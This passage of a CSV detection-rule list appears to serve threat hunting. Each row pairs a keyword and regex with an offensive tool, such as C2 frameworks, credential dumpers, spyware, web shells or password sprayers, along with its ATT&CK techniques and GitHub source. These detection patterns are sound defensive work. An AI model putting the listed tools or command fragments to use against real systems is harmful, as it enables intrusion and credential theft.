TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","false positives expected !","4","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*OutputTokens.txt --onedrive --owa*",".{0,1000}OutputTokens\.txt\s\-\-onedrive\s\-\-owa.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*Out-RundllCommand*",".{0,1000}Out\-RundllCommand.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*OverrideLHOST 360.com*",".{0,1000}OverrideLHOST\s360\.com.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1223","180","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*owa */autodiscover/autodiscover.xml* --recon*",".{0,1000}owa\s.{0,1000}\/autodiscover\/autodiscover\.xml.{0,1000}\s\-\-recon.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*OWASP*Amass*",".{0,1000}OWASP.{0,1000}Amass.{0,1000}","offensive_tool_keyword","amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","N/A","Information Gathering","https://github.com/caffix/amass","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*OwnerPersist-POST.*",".{0,1000}OwnerPersist\-POST\..{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Ox-Bruter.pl*",".{0,1000}Ox\-Bruter\.pl.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","7","10","N/A","N/A","N/A","N/A" "*-p 5000:5000 pador_vuln_server*",".{0,1000}\-p\s5000\:5000\spador_vuln_server.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*P@ss4Hagrid29*",".{0,1000}P\@ss4Hagrid29.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","content","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*P0cL4bs*",".{0,1000}P0cL4bs.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting lots of exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/P0cL4bs","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*p0dalirius/Coercer*",".{0,1000}p0dalirius\/Coercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","1","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*p0dalirius/ExtractBitlockerKeys*",".{0,1000}p0dalirius\/ExtractBitlockerKeys.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","1","N/A","10","3","282","39","2024-04-02T18:40:17Z","2023-09-19T07:28:11Z" "*p0dalirius/LDAPWordlistHarvester*",".{0,1000}p0dalirius\/LDAPWordlistHarvester.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","288","22","2024-03-14T17:52:34Z","2023-09-22T10:10:10Z" "*p0dalirius/pyLAPS*",".{0,1000}p0dalirius\/pyLAPS.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","N/A","9","1","60","11","2024-03-31T12:13:57Z","2021-10-05T18:35:21Z" "*p0f -i eth* -p*",".{0,1000}p0f\s\-i\seth.{0,1000}\s\-p.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*p0f/p0f.fp*",".{0,1000}p0f\/p0f\.fp.{0,1000}","offensive_tool_keyword","p0f","P0f is a tool that utilizes an array of sophisticated purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications","T1046 - T1040","TA0007 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.kali.org/tools/p0f/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*P0rtcu11i5!*",".{0,1000}P0rtcu11i5!.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*p0wnedShell*",".{0,1000}p0wnedShell.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/Cn33liz/p0wnedShell","1","1","N/A","N/A","10","1513","342","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z" "*p0wny-shell*",".{0,1000}p0wny\-shell.{0,1000}","offensive_tool_keyword","p0wny-shell","p0wny@shell:~# is a very basic. single-file. PHP shell. It can be used to quickly execute commands on a server when pentesting a PHP application. Use it with caution: this script represents a security risk for the server.","T1059 - T1027 - T1053 - T1035 - T1105","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/flozz/p0wny-shell","1","1","N/A","N/A","10","1987","624","2024-04-29T03:35:22Z","2016-11-09T20:41:01Z" "*p3nt4/Nuages*",".{0,1000}p3nt4\/Nuages.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*P4wnP1*",".{0,1000}P4wnP1.{0,1000}","offensive_tool_keyword","P4wnP1","P4wnP1 is a highly customizable USB attack platform. based on a low cost Raspberry Pi Zero or Raspberry Pi Zero W (required for HID backdoor).","T1200 - T1056.001 - T1059.003 - T1547.001","TA0002 - TA0003 - TA0004","N/A","N/A","Network Exploitation tools","https://github.com/RoganDawes/P4wnP1","1","1","N/A","N/A","10","3933","659","2019-10-31T12:30:16Z","2017-02-22T14:34:09Z" "*P8CuaPrgwBjunvZxJcgq*",".{0,1000}P8CuaPrgwBjunvZxJcgq.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","10","2","128","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z" "*pack_py_payload*",".{0,1000}pack_py_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*package com.blackh4t*",".{0,1000}package\scom\.blackh4t.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/darkr4y/geacon","1","0","N/A","10","10","1107","204","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z" "*package externc2*",".{0,1000}package\sexternc2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*package kidlogger*",".{0,1000}package\skidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*package saint.keylogger*",".{0,1000}package\ssaint\.keylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*package saint.webcam*",".{0,1000}package\ssaint\.webcam.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*package_cvs_into_lse.sh*",".{0,1000}package_cvs_into_lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*package=impacket*",".{0,1000}package\=impacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*packer.exe *.exe *.exe*",".{0,1000}packer\.exe\s.{0,1000}\.exe\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","9","1","50","13","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z" "*PackMyPayload.py*",".{0,1000}PackMyPayload\.py.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*PackMyPayload-master*",".{0,1000}PackMyPayload\-master.{0,1000}","offensive_tool_keyword","PackMyPayload","A PoC that packages payloads into output containers to evade Mark-of-the-Web flag & demonstrate risks associated with container file formats","T1027 - T1036 - T1048 - T1070 - T1096 - T1195","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/mgeeky/PackMyPayload/","1","1","N/A","10","8","798","128","2023-09-14T23:45:52Z","2022-02-08T19:26:28Z" "*pacman -S hekatomb*",".{0,1000}pacman\s\-S\shekatomb.{0,1000}","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1003 - T1555.002 - T1482 - T1087","TA0006 - TA0005 - TA0007","N/A","N/A","Credential Access","https://github.com/ProcessusT/HEKATOMB","1","0","N/A","10","5","444","48","2024-05-01T06:31:37Z","2022-09-09T15:07:15Z" "*pacman -S rustcat*",".{0,1000}pacman\s\-S\srustcat.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*pacu --exec *",".{0,1000}pacu\s\-\-exec\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --list-modules*",".{0,1000}pacu\s\-\-list\-modules.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --module-args=*",".{0,1000}pacu\s\-\-module\-args\=.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --module-info*",".{0,1000}pacu\s\-\-module\-info.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --module-name *",".{0,1000}pacu\s\-\-module\-name\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --session *",".{0,1000}pacu\s\-\-session\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --set-regions *",".{0,1000}pacu\s\-\-set\-regions\s.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu --whoami*",".{0,1000}pacu\s\-\-whoami.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu/core pacu*",".{0,1000}pacu\/core\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu/last_update.txt*",".{0,1000}pacu\/last_update\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*pacu-master.zip*",".{0,1000}pacu\-master\.zip.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*padlock2john.py*",".{0,1000}padlock2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*padre -u *http*://*",".{0,1000}padre\s\-u\s.{0,1000}http.{0,1000}\:\/\/.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*padre-master.zip*",".{0,1000}padre\-master\.zip.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*pamspy: Failed to increase RLIMIT_MEMLOCK limit!*",".{0,1000}pamspy\:\sFailed\sto\sincrease\sRLIMIT_MEMLOCK\slimit!.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pamspy: Failed to load BPF program: *",".{0,1000}pamspy\:\sFailed\sto\sload\sBPF\sprogram\:\s.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pamspy: Unable to find pam_get_authtok function in*",".{0,1000}pamspy\:\sUnable\sto\sfind\spam_get_authtok\sfunction\sin.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*papacat -l -p *",".{0,1000}papacat\s\-l\s\-p\s.{0,1000}","offensive_tool_keyword","JustEvadeBro","JustEvadeBro a cheat sheet which will aid you through AMSI/AV evasion & bypasses.","T1562.001 - T1055.012 - T1218.011","TA0005 - TA0040 - TA0010","N/A","N/A","Defense Evasion","https://github.com/sinfulz/JustEvadeBro","1","0","N/A","8","3","278","25","2024-04-04T02:43:34Z","2021-05-11T06:26:10Z" "*ParamPamPam*",".{0,1000}ParamPamPam.{0,1000}","offensive_tool_keyword","ParamPamPam","This tool is used for brute discover GET and POST parameters.","T1110 - T1210 - T1211","TA0001 - TA0002 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Bo0oM/ParamPamPam","1","1","N/A","N/A","3","262","61","2022-06-27T11:45:19Z","2018-11-10T08:38:30Z" "*pard0p/Cordyceps*",".{0,1000}pard0p\/Cordyceps.{0,1000}","offensive_tool_keyword","Cordyceps","C++ self-Injecting dropper based on various EDR evasion techniques","T1055 - T1055.001 - T1070.004 - T1564.001","TA0005 - TA0002 ","N/A","N/A","Defense Evasion","https://github.com/pard0p/Cordyceps","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*parrot*security.vdi*",".{0,1000}parrot.{0,1000}security\.vdi.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*parrotsec.org/download/*",".{0,1000}parrotsec\.org\/download\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Parrot-security-*.iso*",".{0,1000}Parrot\-security\-.{0,1000}\.iso.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*parse the .beacon_keys to RSA private key and public key in pem format*",".{0,1000}parse\sthe\s\.beacon_keys\sto\sRSA\sprivate\skey\sand\spublic\skey\sin\spem\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 